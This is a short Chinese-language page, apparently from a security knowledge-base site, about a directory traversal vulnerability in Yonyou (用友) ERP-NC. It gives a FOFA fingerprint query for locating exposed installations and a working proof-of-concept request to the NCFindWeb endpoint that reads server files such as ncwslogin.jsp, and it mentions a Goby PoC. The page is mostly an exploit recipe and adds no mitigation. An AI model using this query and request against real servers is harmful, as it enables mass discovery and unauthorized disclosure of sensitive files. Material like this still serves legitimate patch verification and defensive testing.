menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 用友OA chevron_right 用友ERP-NC 目录遍历漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    用友ERP-NC 目录遍历漏洞.md
    539 B / 2021-04-15 12:15:19
        # 用友ERP-NC 目录遍历漏洞
    
    ## 漏洞描述
    
    用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息
    
    ## 漏洞影响
    
    > [!NOTE]
    >
    > 用友ERP-NC 
    
    ##  FOFA
    
    > [!NOTE]
    >
    > app="用友-UFIDA-NC"
    
    ## 漏洞复现
    
    POC为
    
    ```
    /NCFindWeb?service=IPreAlertConfigService&filename=
    ```
    
    ![](image/yongyou-8.png)
    
    查看 ncwslogin.jsp 文件
    
    ![](image/yongyou-9.png)
    
    ## Goby & POC
    
    > [!NOTE]
    >
    > YongYou ERP-NC directory traversal
    
    ![](image/yongyou-10.png)
    
    links
    file_download